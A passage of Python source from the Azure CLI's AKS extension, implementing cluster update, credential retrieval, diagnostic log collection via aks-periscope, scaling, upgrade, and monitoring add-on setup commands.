raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
# ids -> i_ds due to track 2 naming issue
instance.aad_profile.admin_group_object_i_ds = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise CLIError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if enable_public_fqdn and disable_public_fqdn:
raise MutuallyExclusiveArgumentError(
'Cannot specify "--enable-public-fqdn" and "--disable-public-fqdn" at the same time')
is_private_cluster = instance.api_server_access_profile is not None and instance.api_server_access_profile.enable_private_cluster
if enable_public_fqdn:
if not is_private_cluster:
raise ArgumentUsageError('--enable-public-fqdn can only be used for private cluster')
instance.api_server_access_profile.enable_private_cluster_public_fqdn = True
if disable_public_fqdn:
if not is_private_cluster:
raise ArgumentUsageError('--disable-public-fqdn can only be used for private cluster')
if instance.api_server_access_profile.private_dns_zone.lower() == CONST_PRIVATE_DNS_ZONE_NONE:
raise ArgumentUsageError('--disable-public-fqdn cannot be applied for none mode private dns zone cluster')
instance.api_server_access_profile.enable_private_cluster_public_fqdn = False
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
if not _is_pod_identity_addon_enabled(instance):
# we only rebuild the pod identity profile if it's disabled before
_update_addon_pod_identity(
instance, enable=True,
allow_kubenet_consent=enable_pod_identity_with_kubenet,
)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
azure_keyvault_secrets_provider_addon_profile = None
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
azure_keyvault_secrets_provider_addon_profile = instance.addon_profiles.get(CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, None)
azure_keyvault_secrets_provider_enabled = CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME].enabled
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
if enable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--enable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--disable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if tags:
instance.tags = tags
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
headers = get_aks_custom_headers(aks_custom_headers)
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
logger.error(
"AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.cli.core.profiles import ResourceType
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except HttpResponseError as ex:
if ex.status_code != 404:
raise ex
else:
ResourceGroup = cmd.get_models('ResourceGroup', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
resource_group = ResourceGroup(location=workspace_region)
resource_groups.create_or_update(default_workspace_resource_group, resource_group)
GenericResource = cmd.get_models('GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _sanitize_loganalytics_ws_resource_id(workspace_resource_id):
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
return workspace_resource_id
def _ensure_container_insights_for_monitoring(cmd,
addon,
cluster_subscription,
cluster_resource_group_name,
cluster_name,
cluster_region,
remove_monitoring=False,
aad_route=False,
create_dcr=False,
create_dcra=False):
"""
Either adds the ContainerInsights solution to a LA Workspace OR sets up a DCR (Data Collection Rule) and DCRA
(Data Collection Rule Association). Both let the monitoring addon send data to a Log Analytics Workspace.
Set aad_route == True to set up the DCR data route. Otherwise the solution route will be used. Create_dcr and
create_dcra have no effect if aad_route == False.
Set remove_monitoring to True and create_dcra to True to remove the DCRA from a cluster. The association makes
it very hard to delete either the DCR or cluster. (It is not obvious how to even navigate to the association from
the portal, and it prevents the cluster and DCR from being deleted individually).
"""
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
